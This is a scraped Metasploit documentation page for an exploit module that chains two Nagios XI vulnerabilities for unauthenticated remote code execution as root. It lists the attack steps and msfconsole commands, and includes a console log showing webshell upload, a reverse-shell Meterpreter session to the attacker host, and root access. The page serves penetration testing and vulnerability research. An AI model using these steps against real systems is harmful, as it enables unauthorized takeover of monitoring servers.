PageRenderTime 35ms CodeModel.GetById 0ms RepoModel.GetById 0ms app.codeStats 0ms

/documentation/modules/exploit/linux/http/nagios_xi_magpie_debug.md

https://github.com/rapid7/metasploit-framework
Markdown | 100 lines | 80 code | 20 blank | 0 comment | 0 complexity | 39cd394aa601e16c9ed8a221013a5f82 MD5 | raw file
    

  1. ## Vulnerable Application
    2. 

  2. 

  3. This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
    4. 

  4. CVE-2018-15708 which allows for unauthenticated remote code execution
    5. 

  5. and CVE-2018-15710 which allows for local privilege escalation.
    6. 

  6. When combined, these two vulnerabilities allow execution of arbitrary
    7. 

  7. commands as root.
    8. 

  8. 

  9. The exploit works as follows:
    10. 

  10. 

  11. - A local HTTPS server is setup. When it is reached, this server responds with a payload.
    12. 

  12. - By crafting a malicious request, we make the target host send a request to our HTTPS server.
    13. 

  13.   - The local HTTPS server must be reachable from the Nagios host.
    14. 

  14.   - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
    15. 

  15. - A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
    16. 

  16. - A command is executed via the webshell. This command elevates privileges and runs the payload executable.
    17. 

  17. 

  18. ## Verification Steps
    19. 

  19. 

  20. Download a vulnerable version of the Nagios XI virtual appliance:
    21. 

  21. 

  22. * https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova
    23. 

  23. * https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.13-64.ova
    24. 

  24. * https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.0-64.ova
    25. 

  25. * https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.6-64.ova
    26. 

  26. 

  27. Or download a [vulnerable application installer](https://www.nagios.com/downloads/nagios-xi/older-releases/) and follow the
    28. 

  28. [installation instructions](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
    29. 

  29. 

  30. Metasploit:
    31. 

  31. 

  32. 1. `msfconsole`
    33. 

  33. 1. `use exploit/linux/http/nagios_xi_magpie_debug`
    34. 

  34. 1. `set RHOSTS [IP]`
    35. 

  35. 1. `set RSRVHOST [IP]`
    36. 

  36. 1. `exploit`
    37. 

  37. 1. You should get a new session with *root* privileges
    38. 

  38. 

  39. ## Options
    40. 

  40. 

  41. ### RSRVHOST
    42. 

  42. 

  43. IP address at which the local HTTPS server can be reached.
    44. 

  44. Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).
    45. 

  45. 

  46. ### RSRVPORT
    47. 

  47. 

  48. Port at which the local HTTPS server can be reached.
    49. 

  49. 

  50. ## Scenarios
    51. 

  51. 

  52. ## NagiosXI 5.5.6 (x64) virtual appliance
    53. 

  53. 

  54. ```
    55. 

  55. msf6 > use exploit/linux/http/nagios_xi_magpie_debug
    56. 

  56. [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
    57. 

  57. msf6 exploit(linux/http/nagios_xi_magpie_debug) > set rhosts 10.1.1.113
    58. 

  58. rhosts => 10.1.1.113
    59. 

  59. msf6 exploit(linux/http/nagios_xi_magpie_debug) > set rsrvhost 10.1.1.114
    60. 

  60. rsrvhost => 10.1.1.114
    61. 

  61. msf6 exploit(linux/http/nagios_xi_magpie_debug) > run
    62. 

  62. [*] Exploit running as background job 0.
    63. 

  63. [*] Exploit completed, but no session was created.
    64. 

    65. 

  65. [*] Started reverse TCP handler on 10.1.1.114:4444 
    66. 

  66. [*] Executing automatic check (disable AutoCheck to override)
    67. 

  67. [+] The target appears to be vulnerable. Found MagpieRSS.
    68. 

  68. [*] Using URL: https://0.0.0.0:8080/iRtxnl8L
    69. 

  69. [*] Local IP: https://10.1.1.114:8080/iRtxnl8L
    70. 

  70. [*] Server started.
    71. 

  71. [*] Uploading to /usr/local/nagvis/share/fbHGUhauqtV.php ...
    72. 

  72. [+] fbHGUhauqtV.php uploaded successfully!
    73. 

  73. [*] Using URL: https://0.0.0.0:8080/YvyES7YlFee8R
    74. 

  74. [*] Local IP: https://10.1.1.114:8080/YvyES7YlFee8R
    75. 

  75. [*] Server started.
    76. 

  76. [*] Uploading to /usr/local/nagvis/share/nYRTioXKBam ...
    77. 

  77. [+] nYRTioXKBam uploaded successfully!
    78. 

  78. [*] Checking PHP web shell: /nagvis/fbHGUhauqtV.php
    79. 

  79. [+] Success! Commands executed as user: uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
    80. 

  80. [*] Attempting privilege escalation ...
    81. 

  81. [*] Sending stage (3008420 bytes) to 10.1.1.113
    82. 

  82. [*] Meterpreter session 1 opened (10.1.1.114:4444 -> 10.1.1.113:42314) at 2021-03-16 02:58:20 -0400
    83. 

  83. [+] Deleted /usr/local/nagvis/share/fbHGUhauqtV.php
    84. 

  84. [+] Deleted /usr/local/nagvis/share/nYRTioXKBam
    85. 

  85. [!] This exploit may require manual cleanup of '/var/tmp/hRyNmrQHZAq.nse' on the target
    86. 

  86. [*] Server stopped.
    87. 

    88. 

  88. msf6 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
    89. 

  89. [*] Starting interaction with 1...
    90. 

    91. 

  91. meterpreter > getuid
    92. 

  92. Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
    93. 

  93. meterpreter > sysinfo
    94. 

  94. Computer     : localhost.localdomain
    95. 

  95. OS           : CentOS 7.5.1804 (Linux 3.10.0-862.14.4.el7.x86_64)
    96. 

  96. Architecture : x64
    97. 

  97. BuildTuple   : x86_64-linux-musl
    98. 

  98. Meterpreter  : x64/linux
    99. 

  99. meterpreter >
    100. 

  100. ```
    101. 

  101.